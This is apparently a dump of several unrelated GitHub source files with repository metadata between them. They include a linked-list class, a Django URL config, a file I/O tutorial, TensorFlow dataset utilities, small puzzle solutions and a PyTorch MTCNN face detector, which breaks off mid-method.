logging.error(f"{filename} - Errors occurred during loading of data: {error_count}")
return data
if __name__ == "__main__":
configFileName = "../../config/config.default.json"
loaded_config = load_config(default_config=configFileName)
logConfig = loaded_config["logging"]
logging.basicConfig(
level=logConfig["log_level"],
format=logConfig["log_fstr_std"],
datefmt=logConfig["log_date_formt"]
)
pass
|
Magnus1990P/shodan_extractor
|
src/ShodanExtractor/common.py
|
common.py
|
py
| 7,089 |
python
|
en
|
code
| 0 |
github-code
|
6
|
22957669261
|
class Node:
def __init__(self, value):
self.value = value
self.next = None
def __str__(self):
return str(self.value)
class LinkedList:
def __init__(self):
self.First = None
self.Size = 0
def append(self, value):
myNode = Node(value)
if self.Size == 0:
self.First = myNode
self.Last = myNode
else:
currentNode = self.First
while currentNode.next is not None:
currentNode = currentNode.next
currentNode.next = myNode
self.Last = myNode
self.Size +=1
return myNode
def remove(self, value):
if self.Size == 0:
return False
else:
currentNode = self.First
try:
while currentNode.next.value != value:
currentNode = currentNode.next
deleteNode = currentNode.next
currentNode.next = deleteNode.next
deleteNode.value = None
except AttributeError:
return False
self.Size -= 1
return deleteNode
def pop(self):
currentNode = self.First
i=0
while i < len(self):
i+=1
currentNode = currentNode.next
if i==0:
print("No existen Nodos")
elif i == 1:
del self.First
print("Ya no hay Nodos")
exit()
else:
cont = 1
nodo = self.First
while cont < len(self)-1:
nodo = nodo.next
cont += 1
self.Last = nodo
#print(f"{nodo} ____{nodo.next}")
self.Last.next = None
self.Size -= 1
def prepend(self, value):
myNode = Node(value)
if self.Size == 0:
self.First = myNode
self.Last = myNode
self.Size = 1
else:
myNode.next = self.First
self.First = myNode
self.Size +=1
def popfisrt(self):
if len(self)==0:
print("No hay nodos")
return False
elif len(self)==1:
emptyNode = Node(" ")
self.First=emptyNode
self.Last = emptyNode
self.Size -= 1
return 0
else:
aux=self.First.next
self.First=aux
self.Size -= 1
def get(self, index):
currentNode = self.First
if index>self.Size:
print("Valor no permitido")
else:
for i in range(index):
currentNode = currentNode.next
return currentNode
def insert (self, index, value):
myNode = Node(value)
currentNode = self.First
if index>self.Size:
print("Valor no permitido")
elif index == 0:
self.First = myNode
myNode.next=currentNode
self.Size +=1
else:
for i in range(index-1):
currentNode = currentNode.next
aux=currentNode.next
currentNode.next=myNode
myNode.next=aux
self.Size+=1
def set (self, index, value):
myNode = self.get(index)
myNode.value=value
def removeIndex(self, index):
currentNode = self.First
if index == len(self):
            self.pop()
else:
for i in range(index-1):
currentNode=currentNode.next
deletedNode = currentNode.next
currentNode.next = deletedNode.next
deletedNode.value = None
self.Size-=1
def __len__(self):
return self.Size
def __str__(self):
String = "["
currentNode = self.First
for i in range(len(self)):
String += str(currentNode)
            if i != len(self)-1:
String += str(", ")
currentNode = currentNode.next
String += "]"
return String
myList = LinkedList()
|
MarioAguilarReal/Python
|
Programación Estructurada/Listas Ligadas/LinkedList.py
|
LinkedList.py
|
py
| 4,106 |
python
|
en
|
code
| 0 |
github-code
|
6
|
39104149472
|
from django.urls import path
from . import views
app_name = 'orders'
urlpatterns = [
path('checkout', views.checkout, name='checkout'),
path('order_details', views.order_detail, name='order_details'),
path('orders', views.orders, name='orders'),
path('create_order/', views.create_order, name='create_order'),
]
|
suveydacan/book_shopping_microservice
|
MyProject/orders/urls.py
|
urls.py
|
py
| 333 |
python
|
en
|
code
| 1 |
github-code
|
6
|
30763965983
|
# Obj: Data persistance
# Opt1: External files
# Opt2: DB
# Procedure:
# Create the external file.
# Open the file
# Manipulate the file
# Close the file
from io import open
# First parameter file name, second parameter mode to open (read, write)
textFile = open('file.txt', 'w')
line = 'Great day to code Python \nIsn\'t it?'
textFile.write(line) # writing on the file
textFile.close() # closing the file
textFile = open('file.txt', 'r') # Opens the file on read mode
text = textFile.read() # reads the file
textFile.close() # closing the file
print(text)
textFile = open('file.txt', 'r') # Opens the file on read mode
# reads the file line by line saving each one of themn on a list
textLines = textFile.readlines()
textFile.close() # closes the file
print(textLines[0])
# a parameter allows to append lines to the text file
textFile = open('file.txt', 'a')
textFile.write('\nEveryday it\'s a good day to code')
textFile.close()
textFile = open('file.txt', 'r')
print(textFile.read())
print(textFile.read()) # After executing the first read command, the pointer stays at the end of the file, so the second time it's executed there are no more lines ahead and it won't print anything
# seek sets the pointer to the given position, in this case index = 0
textFile.seek(0)
print(textFile.read())
print(textFile.read(11)) # Starts reading on the given position (11)
textFile.close()
# Writing and reading mode, sets the pointer on the first position
textFile = open('file.txt', 'r+')
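# A minimal additional sketch (added; not part of the original lesson): the same
# read/append flow using a context manager, which closes the file automatically.
with open('file.txt', 'r+') as managedFile:
    print(managedFile.read())
    managedFile.write('\nClosed automatically when the with-block ends')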
|
Giorc93/PythonCourse
|
ExternalFiles/TextFiles/externalText.py
|
externalText.py
|
py
| 1,508 |
python
|
en
|
code
| 1 |
github-code
|
6
|
44098268965
|
import tensorflow as tf
import numpy as np
from typing import Union, Optional, Sequence
from pathlib import Path
from dui.datasets.hdf5datasetfactory import HDF5DatasetFactory
from dui.utils.signal import compress_db
from dui.layers.utils import get_channel_axis
def create_image_dataset(
path: Union[str, Path],
name: str,
factor: Union[str, float] = '0db',
# TODO: None as default or 1?
signal_type: str = 'rf',
# TODO: None or 'raw' as default?
data_format: str = 'channels_last',
# TODO: patch paddings typing elsewhere if validated
# paddings: Optional[Union[Sequence[int], np.ndarray]] = None,
paddings: Optional[Union[Sequence[Sequence[int]], np.ndarray]] = None,
start: int = 0,
stop: Optional[int] = None,
step: int = 1,
slicer: Optional[Sequence[slice]] = None,
batch_size: int = 1,
shuffle: bool = False,
num_parallel_calls: Optional[int] = None,
seed: Optional[int] = None,
) -> tf.data.Dataset:
# Factory
dataset_factory = HDF5DatasetFactory(
path=path,
name=name,
start=start,
stop=stop,
step=step,
slicer=slicer,
shuffle=shuffle,
seed=seed
)
# Check sample shape
base_sample_shape = dataset_factory._output_sample_shape
if len(base_sample_shape) != 2:
raise ValueError(
"Dataset sample must be a 2D array. Current shape: {}".format(
base_sample_shape
)
)
# Normalization factor
if isinstance(factor, str):
attr_key = factor
factor = dataset_factory.attrs.get(attr_key)
if factor is None:
raise ValueError(
"No attribute '{}' for dataset '{}' in '{}'".format(
attr_key, dataset_factory._dataset.name,
dataset_factory._dataset.file.filename
)
)
elif type(factor) in (int, float):
pass
else:
raise TypeError("Unsupported type for 'factor'")
# Create dataset
dataset = dataset_factory.create_dataset()
# TODO: include factor directly and specialize the pre-processing
# for US-specific only?
# Hack to avoid having an <unknown> shape (probably unsafe)
# TODO: handle this in factory or by sub-classing tf.data.Dataset
# Note: Probably below some Dataset._element_structure properties
# Note: most probably not compatible with 1.15
dataset._element_structure._shape = tf.TensorShape(base_sample_shape)
# Pre-processing
dataset = dataset.batch(batch_size=batch_size)
# TODO: use `dataset.padded_batch` instead and remove following
# `paddings` option from following pre-processing
# TODO: apply normalization factor before
dataset = _preprocess_image_dataset(
dataset=dataset,
factor=factor,
data_format=data_format,
signal_type=signal_type,
paddings=paddings,
num_parallel_calls=num_parallel_calls
)
return dataset
def _preprocess_image_dataset(
dataset: tf.data.Dataset,
factor: Optional[float] = None,
data_format: str = 'channels_last',
signal_type: Optional[str] = None,
paddings: Optional[Union[Sequence[int], np.ndarray]] = None,
num_parallel_calls: Optional[int] = None
) -> tf.data.Dataset:
# Specify pre-processing function as a mapping function
def map_func(x: tf.Tensor) -> tf.Tensor:
return _image_preproc_fun(
x,
factor=factor,
data_format=data_format,
signal_type=signal_type,
paddings=paddings
)
return dataset.map(
map_func=map_func,
num_parallel_calls=num_parallel_calls
)
def _image_preproc_fun(
x: tf.Tensor,
factor: Optional[float] = None,
data_format: str = 'channels_last',
signal_type: Optional[str] = None,
paddings: Optional[Union[Sequence[int], np.ndarray]] = None,
) -> tf.Tensor:
# TODO: check inputs
x = tf.convert_to_tensor(x)
# Normalization factor
if factor:
# TODO: apply factor before and keep this pre-proc
# function only for US-specific transformations?
x /= factor
# Paddings
if paddings is not None:
# TODO: would probably make more sense to remove paddings
# from this US-specific pre-processing function
# x = _batched_pad(x, paddings=paddings)
paddings = np.array(paddings)
valid_pad_shape = 2, 2
pad_shape = paddings.shape
# TODO: this test is too restrictive in general (e.g. 3D)
# but ok for now as we only work on 2D images
if pad_shape != valid_pad_shape:
raise ValueError(
"Incompatible 'paddings' shape. Current: {}. "
"Expected {}".format(pad_shape, valid_pad_shape)
)
paddings = [[0, 0], *paddings.tolist()]
pad_kwargs = {
'paddings': tf.constant(paddings, dtype='int32'),
'mode': 'CONSTANT',
'constant_values': 0
}
x = tf.pad(x, **pad_kwargs)
# Channel axis
channel_axis = get_channel_axis(data_format=data_format)
# Signal type
if signal_type is not None:
if signal_type == 'rf':
x = tf.math.real(x)
elif signal_type == 'iq':
# Stack complex components in channels
x = tf.stack((tf.math.real(x), tf.math.imag(x)), axis=channel_axis)
elif signal_type == 'env':
# Takes modulus of complex IQ signal
x = tf.math.abs(x)
elif signal_type == 'bm':
# Takes modulus of complex IQ signal
x = tf.math.abs(x)
# Compress to dB
x = compress_db(tensor=x)
elif signal_type == 'raw':
pass
else:
raise ValueError("Invalid signal type")
# Expand dimension
if signal_type != 'iq':
x = tf.expand_dims(x, axis=channel_axis)
return x
|
dperdios/dui-ultrafast
|
dui/datasets/utils.py
|
utils.py
|
py
| 6,117 |
python
|
en
|
code
| 14 |
github-code
|
6
|
11004498308
|
from typing import List
class Solution:
def findLongestChain(self, pairs: List[List[int]]) -> int:
pairs.sort(key = lambda a:a[0])
dp = [1] * len(pairs)
ans = 1
for i in range(len(pairs)):
for j in range(i):
if pairs[i][0] > pairs[j][1]:
dp[i] = max(dp[j]+1, dp[i])
ans = max(dp[i], ans)
return ans
|
xixihaha1995/CS61B_SP19_SP20
|
temp/toy/python/646. Maximum Length of Pair Chain.py
|
646. Maximum Length of Pair Chain.py
|
py
| 386 |
python
|
en
|
code
| 0 |
github-code
|
6
|
31653944297
|
#!/usr/bin/env python3
""" Using p022_names.txt, a 46K text file containing over five-thousand first names,
begin by sorting it into alphabetical order. Then working out the
alphabetical value for each name, multiply this value by its alphabetical position in the list
to obtain a name score.
For example, when the list is sorted into alphabetical order, COLIN, which is worth
3 + 15 + 12 + 9 + 14 = 53, is the 938th name in the list. So, COLIN would obtain a score of
938 × 53 = 49714.
What is the total of all the name scores in the file?
"""
import csv
alphabet = "_ABCDEFGHIJKLMNOPQRSTUVWXYZ"
with open('p022_names.txt', newline='') as f:
reader = csv.reader(f)
name_list = next(reader)
name_list.sort()
total = 0
for name in name_list:
name_score = 0
for letter in name:
name_score += alphabet.index(letter)
name_score *= (name_list.index(name) + 1)
total += name_score
print(f'Total score {total}')
|
ilee38/practice-python
|
coding_problems/project_e/22_names_scores.py
|
22_names_scores.py
|
py
| 1,010 |
python
|
en
|
code
| 0 |
github-code
|
6
|
72000467069
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import builtins
import gc
import os
import time
import numpy as np
import torch
from trident.backend.common import *
from trident.backend.opencv_backend import image2array
from trident.backend.pytorch_backend import *
from trident.backend.pytorch_backend import Layer, Sequential, load, get_device, fix_layer
from trident.backend.pytorch_ops import *
from trident.data.image_common import *
from trident.data.utils import download_model_from_google_drive
from trident.data.vision_transforms import Normalize
from trident.layers.pytorch_activations import PRelu
from trident.layers.pytorch_layers import *
from trident.layers.pytorch_pooling import *
from trident.optims.pytorch_trainer import ImageDetectionModel
__all__ = ['Pnet', 'Rnet', 'Onet', 'Mtcnn']
_session = get_session()
_device = get_device()
_epsilon = _session.epsilon
_trident_dir = _session.trident_dir
dirname = os.path.join(_trident_dir, 'models')
if not os.path.exists(dirname):
try:
os.makedirs(dirname)
except OSError:
# Except permission denied and potential race conditions
# in multi-threaded environments.
pass
def p_net():
return Sequential(
Conv2d((3, 3), 10, strides=1, auto_pad=False, use_bias=True, name='conv1'),
PRelu(num_parameters=1),
MaxPool2d((2, 2), strides=2, auto_pad=False),
Conv2d((3, 3), 16, strides=1, auto_pad=False, use_bias=True, name='conv2'),
PRelu(num_parameters=1),
Conv2d((3, 3), 32, strides=1, auto_pad=False, use_bias=True, name='conv3'),
PRelu(num_parameters=1),
ModuleDict(
{'confidence': Conv2d((1, 1), 1, strides=1, auto_pad=False, use_bias=True, activation='sigmoid',
name='conv4_1'),
'box': Conv2d((1, 1), 4, strides=1, auto_pad=False, use_bias=True, name='conv4_2'),
'landmark': Conv2d((1, 1), 10, strides=1, auto_pad=False, use_bias=True, name='conv4_3')},
is_multicasting=True)
, name='pnet')
def r_net():
return Sequential(
Conv2d((3, 3), 28, strides=1, auto_pad=False, use_bias=True, name='conv1'),
PRelu(num_parameters=1),
MaxPool2d((3, 3), strides=2, auto_pad=False),
Conv2d((3, 3), 48, strides=1, auto_pad=False, use_bias=True, name='conv2'),
PRelu(num_parameters=1),
MaxPool2d((3, 3), strides=2, auto_pad=False),
Conv2d((2, 2), 64, strides=1, auto_pad=False, use_bias=True, name='conv3'),
PRelu(num_parameters=1),
Flatten(),
Dense(128, activation=None, use_bias=True, name='conv4'),
PRelu(num_parameters=1),
ModuleDict({
'confidence': Dense(1, activation='sigmoid', use_bias=True, name='conv5_1'),
'box': Dense(4, activation=None, use_bias=True, name='conv5_2'),
'landmark': Dense(10, activation=None, use_bias=True, name='conv5_3')}, is_multicasting=True)
, name='rnet')
def o_net():
return Sequential(
Conv2d((3, 3), 32, strides=1, auto_pad=False, use_bias=True, name='conv1'),
PRelu(num_parameters=1),
MaxPool2d((3, 3), strides=2, auto_pad=False),
Conv2d((3, 3), 64, strides=1, auto_pad=False, use_bias=True, name='conv2'),
PRelu(num_parameters=1),
MaxPool2d((3, 3), strides=2, auto_pad=False),
Conv2d((3, 3), 64, strides=1, auto_pad=False, use_bias=True, name='conv3'),
PRelu(num_parameters=1),
MaxPool2d((2, 2), strides=2, auto_pad=False),
Conv2d((2, 2), 128, strides=1, auto_pad=False, use_bias=True, name='conv4'),
PRelu(num_parameters=1),
Flatten(),
Dense(256, activation=None, use_bias=True, name='conv5'),
PRelu(num_parameters=1),
ModuleDict({
'confidence': Dense(1, activation='sigmoid', use_bias=True, name='conv6_1'),
'box': Dense(4, activation=None, use_bias=True, name='conv6_2'),
'landmark': Dense(10, activation=None, use_bias=True, name='conv6_3')}, is_multicasting=True)
, name='onet')
def Pnet(pretrained=True,
input_shape=(3, 12, 12),
freeze_features=True,
**kwargs):
if input_shape is not None and len(input_shape) == 3:
input_shape = tuple(input_shape)
else:
input_shape = (3, 12, 12)
pnet = ImageDetectionModel(input_shape=input_shape, output=p_net())
pnet.preprocess_flow = [Normalize(0, 255), image_backend_adaption]
if pretrained == True:
download_model_from_google_drive('1w9ahipO8D9U1dAXMc2BewuL0UqIBYWSX', dirname, 'pnet.pth')
recovery_model = fix_layer(load(os.path.join(dirname, 'pnet.pth')))
pnet.model = recovery_model
pnet.model.input_shape = input_shape
pnet.model.to(_device)
return pnet
def Rnet(pretrained=True,
input_shape=(3, 24, 24),
**kwargs):
if input_shape is not None and len(input_shape) == 3:
input_shape = tuple(input_shape)
else:
input_shape = (3, 24, 24)
rnet = ImageDetectionModel(input_shape=input_shape, output=r_net())
rnet.preprocess_flow = [Normalize(0, 255), image_backend_adaption]
if pretrained == True:
download_model_from_google_drive('1CH7z133_KrcWMx9zXAblMCV8luiQ3wph', dirname, 'rnet.pth')
recovery_model = load(os.path.join(dirname, 'rnet.pth'))
recovery_model = fix_layer(recovery_model)
recovery_model.to(_device)
rnet.model = recovery_model
return rnet
def Onet(pretrained=True,
input_shape=(3, 48, 48),
**kwargs):
if input_shape is not None and len(input_shape) == 3:
input_shape = tuple(input_shape)
else:
input_shape = (3, 48, 48)
onet = ImageDetectionModel(input_shape=(3, 48, 48), output=o_net())
onet.preprocess_flow = [Normalize(0, 255), image_backend_adaption]
if pretrained == True:
download_model_from_google_drive('1a1dAlSzJOAfIz77Ic38JMQJYWDG_b7-_', dirname, 'onet.pth')
recovery_model = load(os.path.join(dirname, 'onet.pth'))
recovery_model = fix_layer(recovery_model)
recovery_model.to(_device)
onet.model = recovery_model
return onet
class DetectorHead(Layer):
def __init__(self, cellsize=12, threshold=0.5, min_size=5, **kwargs):
super(DetectorHead, self).__init__(**kwargs)
self.cellsize = cellsize
self.detection_threshold = threshold
self.min_size = min_size
self._built = True
def forward(self, input, **kwargs):
boxprobs, boxregs, landscape = input.value_list
boxprobs = boxprobs[0]
height, width = boxprobs.shape[1:]
if boxprobs.size(0) == 2:
boxprobs = boxprobs[1:, :, :]
strides = 2
boxregs = boxregs[0]
input_shape = boxprobs.size()
grid = meshgrid(boxprobs.size(1), boxprobs.size(2))
grid = grid.view(2, -1)
score = boxprobs[0]
y, x = torch.where(score >= self.detection_threshold)
boxregs = boxregs.permute(1, 2, 0)
score = score[(y, x)]
reg = boxregs[(y, x)].transpose(1, 0)
bb = torch.stack([x, y], dim=0)
q1 = (strides * bb + 1)
q2 = (strides * bb + self.cellsize - 1 + 1)
w = q2[0, :] - q1[0, :] + 1
h = q2[1, :] - q1[1, :] + 1
b1 = q1[0, :] + reg[0, :] * w
b2 = q1[1, :] + reg[1, :] * h
b3 = q2[0, :] + reg[2, :] * w
b4 = q2[1, :] + reg[3, :] * h
boxs = torch.stack([b1, b2, b3, b4, score], dim=-1)
# keep =torchvision.ops.boxes.remove_small_boxes(boxs[:,:4],min_size=self.min_size)
# boxs=boxs[keep]
# print('total {0} boxes cutoff={1} '.format(len(x), cutoff))
if boxs is None or len(boxs.size()) == 0:
return None
elif len(boxs.size()) == 1:
boxs = boxs.unsqueeze(0)
return boxs
def remove_useless_boxes(boxes, image_size=None, min_size=5):
height, width = image_size if image_size is not None else (None, None)
x1, y1, x2, y2, score = [boxes[:, i] for i in range(5)]
area = (x2 - x1 + 1) * (y2 - y1 + 1)
boxes = boxes[area > min_size * min_size]
x1, y1, x2, y2, score = [boxes[:, i] for i in range(5)]
    greater0 = x1.gt(0).float() * x2.gt(0).float() * y1.gt(0).float() * y2.gt(0).float()
boxes = boxes[greater0 > 0]
x1, y1, x2, y2, score = [boxes[:, i] for i in range(5)]
w = (x2 - x1)
boxes = boxes[w > 1]
x1, y1, x2, y2, score = [boxes[:, i] for i in range(5)]
h = (y2 - y1)
boxes = boxes[h > 1]
return boxes
class Mtcnn(ImageDetectionModel):
def __init__(self, pretrained=True, min_size=10, detection_threshold=(0.4, 0.7, 0.9), nms_threshold=(0.9, 0.8, 0.5),
**kwargs):
self.pnet = Pnet(pretrained=pretrained, input_shape=(3, 12, 12)).model
self.rnet = Rnet(pretrained=pretrained, input_shape=(3, 24, 24)).model
self.onet = Onet(pretrained=pretrained, input_shape=(3, 48, 48)).model
super(Mtcnn, self).__init__(input_shape=(3, 12, 12), output=self.pnet)
self.min_size = min_size
self.detection_threshold = detection_threshold
self.nms_threshold = nms_threshold
self.preprocess_flow = [Normalize(0, 255), image_backend_adaption]
def get_image_pyrimid(self, img, min_size=None, factor=0.709):
if min_size is None:
min_size = self.min_size
min_face_area = (min_size, min_size)
h = img.shape[0]
w = img.shape[1]
minl = np.amin([h, w])
m = 12.0 / min_size
minl = minl * m
        # Collect the scale factors and the corresponding resized images
scales = []
images = []
factor_count = 0
while minl >= 12:
scales += [m * np.power(factor, factor_count)]
scaled_img = rescale(scales[-1])(img.copy())
images.append(scaled_img)
minl = minl * factor
factor_count += 1
return images, scales
def generate_bboxes(self, probs, offsets, scale, threshold):
"""
基於Pnet產生初始的候選框
"""
stride = 2
cell_size = 12
        # Use np.where to pick the feature-map positions (x, y) whose probability exceeds the threshold
inds = where(probs > threshold)
'''
>>> a =np.array([[1,2,3],[4,5,6]])
>>> np.where(a>1)
(array([0, 0, 1, 1, 1]), array([1, 2, 0, 1, 2]))
'''
        # If no position satisfies the probability threshold, return an empty array
if inds[0].size == 0:
return np.array([])
        # Build the x1, y1, x2, y2 offsets from the offset maps output by P-Net
tx1, ty1, tx2, ty2 = [offsets[0, i, inds[0], inds[1]] for i in range(4)]
offsets = stack([tx1, ty1, tx2, ty2], axis=-1)
        # and grab the corresponding probability scores
score = probs[inds[0], inds[1]]
        # P-Net sees images resized by the pyramid scale factors, so the box coordinates are
        # divided by the scale to map them back to the original image size
        # Arranged as: candidate box, score, offsets
bounding_boxes = concate([
round((stride * inds[1] + 1.0) / scale).expand_dims(-1),
round((stride * inds[0] + 1.0) / scale).expand_dims(-1),
round((stride * inds[1] + 1.0 + cell_size) / scale).expand_dims(-1),
round((stride * inds[0] + 1.0 + cell_size) / scale).expand_dims(-1),
score.expand_dims(-1), offsets
], axis=-1)
print(bounding_boxes.shape)
        # bounding_boxes is arranged as [number of boxes, number of box attributes]
return bounding_boxes
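        # Worked example (added note; not in the original): with stride 2, cell_size 12
        # and scale 0.5, a detection at feature-map column x=3, row y=5 maps back to the
        # original image as x1=(2*3+1)/0.5=14, y1=(2*5+1)/0.5=22,
        # x2=(2*3+1+12)/0.5=38, y2=(2*5+1+12)/0.5=46.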
def convert_to_square(self, bboxes):
"""Convert bounding boxes to a square form.
Arguments:
bboxes: a float numpy array of shape [n, 5].
Returns:
a float numpy array of shape [n, 5],
squared bounding boxes.
"""
square_bboxes = zeros_like(bboxes)
x1, y1, x2, y2 = [bboxes[:, i] for i in range(4)]
h = y2 - y1 + 1.0
w = x2 - x1 + 1.0
max_side = maximum(h, w)
square_bboxes[:, 0] = x1 + w * 0.5 - max_side * 0.5
square_bboxes[:, 1] = y1 + h * 0.5 - max_side * 0.5
square_bboxes[:, 2] = square_bboxes[:, 0] + max_side - 1.0
square_bboxes[:, 3] = square_bboxes[:, 1] + max_side - 1.0
return square_bboxes
    # Calibrate the candidate box coordinates
    # Apply the offsets, scaled linearly by the box width and height, to obtain the refined box coordinates
def calibrate_box(self, bboxes, offsets):
"""Transform bounding boxes to be more like true bounding boxes.
'offsets' is one of the outputs of the nets.
Arguments:
bboxes: a float numpy array of shape [n, 5].
offsets: a float numpy array of shape [n, 4].
Returns:
a float numpy array of shape [n, 5].
"""
x1, y1, x2, y2 = [bboxes[:, i] for i in range(4)]
w = x2 - x1 + 1.0
h = y2 - y1 + 1.0
# w [w_len, 1]
w = expand_dims(w, 1)
# h [h_len, 1]
h = expand_dims(h, 1)
translation = concate([w, h, w, h], axis=-1) * offsets
bboxes[:, 0:4] = bboxes[:, 0:4] + translation
return bboxes
    # NMS computed on tensors
def nms(self, box_scores, overlap_threshold=0.5, top_k=-1):
"""Non-maximum suppression.
Arguments:
box_scores: a float numpy array of shape [n, 5],
where each row is (xmin, ymin, xmax, ymax, score).
overlap_threshold: a float number.
Returns:
list with indices of the selected boxes
"""
        # Compute box areas
def area_of(left_top, right_bottom):
"""Compute the areas of rectangles given two corners.
Args:
left_top (N, 2): left top corner.
right_bottom (N, 2): right bottom corner.
Returns:
area (N): return the area.
"""
hw = right_bottom - left_top
return clip(hw[..., 0], min=0) * clip(hw[..., 1], min=0)
        # Compute the IoU (intersection over union)
def iou_of(boxes0, boxes1, eps=1e-5):
"""Return intersection-over-union (Jaccard index) of boxes.
Args:
boxes0 (N, 4): ground truth boxes.
boxes1 (N or 1, 4): predicted boxes.
eps: a small number to avoid 0 as denominator.
Returns:
iou (N): IoU values.
"""
overlap_left_top = maximum(boxes0[..., :2], boxes1[..., :2])
overlap_right_bottom = minimum(boxes0[..., 2:], boxes1[..., 2:])
overlap_area = area_of(overlap_left_top, overlap_right_bottom)
area0 = area_of(boxes0[..., :2], boxes0[..., 2:])
area1 = area_of(boxes1[..., :2], boxes1[..., 2:])
return overlap_area / (area0 + area1 - overlap_area + eps)
        # If there are no valid candidate regions, return an empty list
box_scores = to_tensor(box_scores)
if len(box_scores) == 0:
return []
score = box_scores[:, 4]
boxes = box_scores[:, :4]
        # Indices of the boxes that survive suppression
picked = []
        # Sort by confidence score in ascending order
indexes = argsort(score, descending=False)
while len(indexes) > 0:
            # The last entry therefore has the highest confidence;
            # add it to the keep list
current = indexes[-1]
picked.append(current.item())
            # Compute the IoU between the current box and all remaining candidate boxes
if 0 < top_k == len(picked) or len(indexes) == 1:
break
current_box = boxes[current, :]
current_score = score[current]
            # Everything except the last entry is a remaining box
indexes = indexes[:-1]
rest_boxes = boxes[indexes, :]
iou = iou_of(
rest_boxes,
expand_dims(current_box, axis=0),
)
            # Boxes whose IoU is below the threshold do not overlap the current box and are kept; the rest are discarded
indexes = indexes[iou <= overlap_threshold]
return picked
def detect(self, image):
"""
Arguments:
            image: an RGB image (a file path or a numpy array)
        Returns:
            the candidate boxes and the corresponding facial landmark points
"""
        # Cache the original image
image = image2array(image)
self.image = image
self.height, self.width = image.shape[:2]
min_length = min(self.height, self.width)
        # Stage 1: candidate generation with P-Net
bounding_boxes = []
        # First compute the scale factors of the image pyramid
images, scales = self.get_image_pyrimid(image, min_size=self.min_size, factor=0.707)
        # Run P-Net (a fully convolutional network) once for each scale
for img, scale in zip(images, scales):
            # Generate the candidate regions at this scale,
            # filtered by the probability threshold and de-duplicated with NMS
boxes = self.run_first_stage(img, scale)
print('Scale:', builtins.round(scale * 10000) / 10000.0, 'Scaled Images:', img.shape, 'bboxes:', len(boxes),
flush=True)
if boxes.ndim == 1:
boxes.expand_dims(0)
bounding_boxes.append(boxes)
        # Merge the candidate regions detected at all scales
bounding_boxes = [i for i in bounding_boxes if i is not None]
bounding_boxes = concate(bounding_boxes, axis=0)
        print('total bboxes:', len(bounding_boxes))
        # Calibrate the box coordinates, then run NMS
bounding_boxes = self.calibrate_box(bounding_boxes[:, 0:5], bounding_boxes[:, 5:])
keep = self.nms(bounding_boxes[:, 0:5], self.nms_threshold[0])
bounding_boxes = bounding_boxes[keep]
        # Make the boxes as square as possible
bounding_boxes = self.convert_to_square(bounding_boxes)
bounding_boxes[:, 0:4] = round(bounding_boxes[:, 0:4])
        print('total bboxes after nms:', len(bounding_boxes))
        # # Render the candidate boxes from this stage
# pnet_img = self.image.copy()
# for box in bounding_boxes[:, :4]:
# pnet_img = plot_one_box(box, pnet_img, (255, 128, 128), None, 1)
# plt.figure(figsize=(16, 16))
# plt.axis('off')
# plt.imshow(pnet_img.astype(np.uint8))
if is_gpu_available():
torch.cuda.synchronize()
torch.cuda.empty_cache()
gc.collect()
        # Stage 2: refinement with R-Net
        # Crop the candidate regions kept from stage 1, resize them to 24x24, and let R-Net confirm them and refine the box coordinates
img_boxes = self.get_image_boxes(bounding_boxes, size=24)
print('RNet!')
probs = []
offsets = []
if len(img_boxes) > 16:
for i in range(len(img_boxes) // 16 + 1):
if i * 16< len(img_boxes):
output = self.rnet(to_tensor(img_boxes[i * 16:(i + 1) * 16, :, :, :]))
probs.append(to_numpy(output['confidence']))
offsets.append(to_numpy(output['box']))
del output
probs = np.concatenate(probs, axis=0)
offsets =np.concatenate(offsets, axis=0)
else:
output = self.rnet(to_tensor(img_boxes))
            probs = to_numpy(output['confidence'])  # shape [n_boxes, 1]
            offsets = to_numpy(output['box'])  # shape [n_boxes, 4]
        # Drop boxes whose probability falls below the threshold
keep = np.where(probs[:, 0] > self.detection_threshold[1])[0]
bounding_boxes = to_numpy(bounding_boxes)[keep]
bounding_boxes=np.concatenate([bounding_boxes[:,:4],probs[keep, 0].reshape((-1,1))],axis=1)
#bounding_boxes[:, 4] = probs[keep, 0].reshape((-1,))
offsets = offsets[keep]
        print('total bboxes:', len(bounding_boxes))
        # Refine the box coordinates, then run NMS
bounding_boxes = self.calibrate_box(bounding_boxes, offsets)
keep = self.nms(bounding_boxes, self.nms_threshold[1])
bounding_boxes = bounding_boxes[keep]
        # Make the boxes as square as possible
bounding_boxes = self.convert_to_square(bounding_boxes)
bounding_boxes[:, 0:4] = round(bounding_boxes[:, 0:4]).copy()
        print('total bboxes after nms:', len(bounding_boxes))
        # # Render the candidate boxes from this stage
# rnet_img = self.image.copy()
# for i in range(bounding_boxes.shape[0]):
# box = bounding_boxes[i, :4]
# rnet_img = plot_one_box(box, rnet_img, (255, 128, 128), None, 2)
# plt.figure(figsize=(16, 16))
# plt.axis('off')
# plt.imshow(rnet_img.astype(np.uint8))
if is_gpu_available():
torch.cuda.synchronize()
torch.cuda.empty_cache()
gc.collect()
        # Stage 3: final output with onet
img_boxes = self.get_image_boxes(bounding_boxes, size=48)
if len(img_boxes) == 0:
            return self.image.copy(), [], [], []
print('ONet!')
probs = []
offsets = []
landmarks = []
if len(img_boxes) > 16:
            for i in range(len(img_boxes) // 16 + 1):
if i * 16 < len(img_boxes):
output = self.onet(to_tensor(img_boxes[i * 16:(i + 1) * 16, :, :, :]))
probs.append(output['confidence'].copy())
offsets.append(output['box'].copy())
landmarks.append(output['landmark'].copy())
del output
probs = concate(probs, axis=0)
offsets = concate(offsets, axis=0)
landmarks = concate(landmarks, axis=0)
else:
output = self.onet(to_tensor(img_boxes))
            probs = output['confidence']  # shape [n_boxes, 1]
            offsets = output['box']  # shape [n_boxes, 4]
            # Only this stage needs to produce the facial landmarks
            landmarks = output['landmark']  # shape [n_boxes, 10]
        # Discard boxes whose probability is below the threshold
keep = where(probs[:, 0] > self.detection_threshold[2])[0]
bounding_boxes = bounding_boxes[keep]
bounding_boxes[:, 4] = probs[keep, 0].reshape((-1,))
offsets = offsets[keep]
landmarks = landmarks[keep]
        print('total bboxes:', len(bounding_boxes))
        # Refine the box coordinates, compute the corresponding facial landmark positions, then run nms
        bounding_boxes = self.calibrate_box(bounding_boxes, offsets)
        # Compute the facial landmarks from the model outputs
width = bounding_boxes[:, 2] - bounding_boxes[:, 0] + 1.0
height = bounding_boxes[:, 3] - bounding_boxes[:, 1] + 1.0
xmin, ymin = bounding_boxes[:, 0], bounding_boxes[:, 1]
landmarks[:, 0:5] = expand_dims(xmin, 1) + expand_dims(width, 1) * landmarks[:, 0:5]
